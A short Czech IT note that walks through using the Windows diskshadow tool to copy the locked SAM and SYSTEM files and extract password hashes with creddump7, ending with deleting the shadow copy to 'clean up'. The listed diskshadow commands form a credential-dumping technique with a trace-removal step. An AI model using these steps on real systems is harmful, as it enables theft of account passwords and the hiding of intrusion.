← IT

Stínové kopie svazku — praktické využití

Chci stáhnout soubory C:\Windows\system32\config\SAM a C:\Windows\system32\config\SYSTEM abych z nich mohl na svém PC programem https://www.kali.org/tools/creddump7/ vytáhnout hashe hesel. Tyto soubory jsou používány systémem a tím chráněny proti zkopírování. Windows ale obsahuje nástroj stínové kopie svazku a ten mi stačí 🙂

  1. Spustím v cmd nástroj diskshadow
  2. příkazem set context persistent zajistím, že vytvořené stínové kopie budou trvalými a nezmizí po ukončení nástroje diskshadow (není nezbytné tento příkaz používat)
  3. add volume C: přidá diskový svazek C:
  4. create vytvoří stínovou kopii
  5. list shadows all zobrazí ID stínové kopie
  6. expose {ID_stínové_kopie} Y: připojí stínovou kopii k disku Y:
  7. Spustím nové okno z příkazovým řádkem a zkopíruju si soubory SAM a SYSTEM
  8. unexpose {ID_stínové_kopie} odpojím stínovou kopii
  9. delete shadows oldest smažu stínovou kopii, čímž po sobě tzv. uklidím

Zdroj: osy/Stínové kopie svazku.docx